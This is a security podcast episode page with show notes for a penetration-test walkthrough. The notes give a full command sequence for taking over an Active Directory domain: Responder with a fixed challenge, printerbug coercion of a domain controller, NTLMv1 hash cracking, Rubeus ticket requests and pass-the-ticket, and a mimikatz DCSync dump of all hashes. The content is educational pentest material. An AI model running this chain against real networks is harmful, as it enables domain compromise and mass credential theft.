7MS: #559: Tales of Pentest Pwnage - Part 46
7 Minute Security10 Helmi 2023

7MS: #559: Tales of Pentest Pwnage - Part 46

Ooooo giggidy! Today's episode is about a pentest pwnage path that is super fun and interesting, and I've now seen 3-4 times in the wild. Here are some notes from the audio/video that will help bring this to life for you (oh and read this article for a great tech explanation of what's happening under the hood):

Change the Responder.conf file like so:

; Custom challenge. ; Use "Random" for generating a random challenge for each requests (Default) Challenge = 1122334455667788

Run Responder with --disable-ess flag

sudo python3 /opt/responder/Responder.py -I eth0 --disable-ess

Use printerbug to coax authentication from a domain controller:

sudo python3 /opt/krbrelay-dirkjanm/printerbug.py yourdomain.com/someuser@IP.OF.DOMAIN.CONTROLLER IP.OF.ATTACKING.BOX

Convert hash to make it easier to crack!

sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDER

Take the NTHASH:XXX token and go to crack.sh to have it cracked in about 30 seconds!

Now you can do a Rubeus asktgt with the DC hash:

rubeus.exe asktgt /domain:yourdomain.com /user:DOMAIN-CONTROLLER-NAME$ /rc4:HASH-GOES-HERE /nowrap

Now pass the ticket and impersonate the DC LOL MUAHAHAHAHAHAHAAH!!

rubeus.exe ptt /ticket:TICKET GOES HERE

Use mimikatz to dump all hashes!

mimikatz.exe privilege::debug log hashes.txt lsadump::dcsync /domain:yourdomain.com /all /csv

Jaksot(683)

7MS #242: Bye Bye Dream Job - Part 4

7MS #242: Bye Bye Dream Job - Part 4

We've reached the end of this series, and I come into this final chapter bearing good news: I have a job! So in today's episode, I just wanted to kick back and share some cool things I'm working on as I ramp up in this new adventure (and that will also provide good topics for future episodes): Webapp pentest tool bake-off In the next week I'll be evaluating the following for a more general/automatic Webapp scans: Netsparker HP WebInspect Qualys AppSpider SIEM comparison We're looking at several tools to do both on-prem and managed SIEM solutions. If you've got recommendations or experiences to share I would love to hear them - please contact me. Thanks in advance!

26 Tammi 201710min

7MS #241: Bye Bye Dream Job - Part 3

7MS #241: Bye Bye Dream Job - Part 3

Show notes are here

19 Tammi 201713min

7MS #240: Bye Bye Dream Job - Part 2

7MS #240: Bye Bye Dream Job - Part 2

Show notes are here.

12 Tammi 201712min

7MS #239: Bye Bye Dream Job - Part 1

7MS #239: Bye Bye Dream Job - Part 1

Show notes: https://7ms.us/7ms-239-bye-bye-dream-job-part-1

5 Tammi 20179min

7MS #238: Network Monitoring 101 - Part 2: NMAP, Papertrailapp and OpenCanary

7MS #238: Network Monitoring 101 - Part 2: NMAP, Papertrailapp and OpenCanary

Show notes: https://7ms.us/7ms-238-network-monitoring-101-part-2-nmap-papertrailapp-and-opencanary

30 Marras 20168min

7MS #237: Network Monitoring 101 - Part 1: Nessus

7MS #237: Network Monitoring 101 - Part 1: Nessus

Show notes: https://7ms.us/7ms-237-network-monitoring-101-part-1-nessus

23 Marras 20168min

7MS #236: From "Derp!" to Domain Admin with MOVEit Central

7MS #236: From "Derp!" to Domain Admin with MOVEit Central

Show notes: https://7ms.us/7ms-236-from-derp-to-domain-admin-with-moveit-central

17 Marras 201611min

7MS #235: Pwning Billy Madison

7MS #235: Pwning Billy Madison

Show notes: https://7ms.us/7ms-235-pwning-billy-madison

10 Marras 201610min

Suosittua kategoriassa Politiikka ja uutiset

rss-podme-livebox
aikalisa
ootsa-kuullut-tasta-2
et-sa-noin-voi-sanoo-esittaa
otetaan-yhdet
politiikan-puskaradio
rss-vaalirankkurit-podcast
aihe
the-ulkopolitist
rikosmyytit
rss-mina-ukkola
rss-kovin-paikka
rss-hyvaa-huomenta-bryssel
linda-maria
rss-aijat-hopottaa-podcast
rss-tyolinjalla-pekka-sauri
rss-raha-talous-ja-politiikka
rss-tasta-on-kyse-ivan-puopolo-verkkouutiset
rss-kalevi-sorsa-saation-podcast
rss-kyselytunti